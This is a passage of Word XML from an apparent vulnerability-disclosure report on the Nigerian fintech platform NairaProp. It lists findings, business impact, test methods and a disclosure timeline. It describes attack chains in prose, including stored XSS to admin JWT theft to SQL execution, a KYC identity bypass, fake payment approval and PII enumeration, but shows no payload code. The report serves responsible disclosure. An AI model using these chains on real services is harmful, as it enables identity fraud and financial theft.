            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>SQLi on manual payment reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Parameterized — stored but not executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Webhook signature forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>HMAC validated, no timing oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.env/.git/.config on web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Not exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Source maps (.js.map)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Not exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The vulnerabilities documented in this report have the following potential business impacts:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Full Database Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Stored XSS → Admin JWT → SQL execution endpoint = complete DB read/write. All 14,650+ users' PII, bank details, and financial data accessible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Identity Theft at Scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>KYC auto-approve chain enables any user to assume any Nigerian's verified identity in 2 API calls. Combined with mass PII enumeration (no rate limit), enables industrial-scale identity fraud.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Direct Financial Fraud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Manual payment system accepts fake proof. No verification that payment was made. Admin approves → funded account with zero payment. Combined with stolen identity = untraceable fraud.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Admin Account Takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>7 XSS payloads currently in production DB. Any admin viewing manual payments triggers XSS → JWT stolen → full system access. No 2FA enforced on admin accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Payment Gateway Abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Unauthenticated external gateway creates real checkout sessions. Ghost orders not tracked. Potential for payment fraud and order flooding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Regulatory Compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Platform handles Nigerian financial data. KYC bypass, PII mass enumeration, and identity theft violate NDPR (Nigeria Data Protection Regulation) and CBN regulations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>User Trust Erosion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>177+ users' PII accessible through enumeration. Admin identities and role hierarchy disclosed. Complete lack of security headers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Assessment performed using gray-box testing with an authenticated standard user account. No admin credentials were obtained during testing — all admin endpoint findings are based on error message analysis and JavaScript bundle extraction.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4320"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JS bundle extraction (15+ admin chunks), API endpoint enumeration from ~200 functions, infrastructure fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Authentication Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JWT analysis, password reset flow, magic link testing, 2FA assessment, OTP brute force analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Authorization Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>IDOR on 30+ endpoints, mass assignment on profile, role escalation attempts, admin endpoint probing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Injection Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>SQLi (blind + error-based), NoSQL injection, XSS (7+ payload variants stored), SSRF via proof URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Business Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>KYC bypass chain, payment fraud via manual requests, affiliate auto-registration, downtime claim fraud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Configuration Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Security headers, CORS policy, rate limiting assessment, error message analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>External Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Unauthenticated checkout, price manipulation, ghost order analysis, Squad integration assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Disclosure Timeline</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4320"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>29 June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Vulnerability report submitted to NairaProp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>T+7 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Expected acknowledgment of receipt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>T+30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
            <w:shd w:fill="f0f0f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Expected remediation plan / patch for P0 findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>T+90 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7370"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Public disclosure deadline (per responsible disclosure policy)</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Consolas" w:hAnsi="Consola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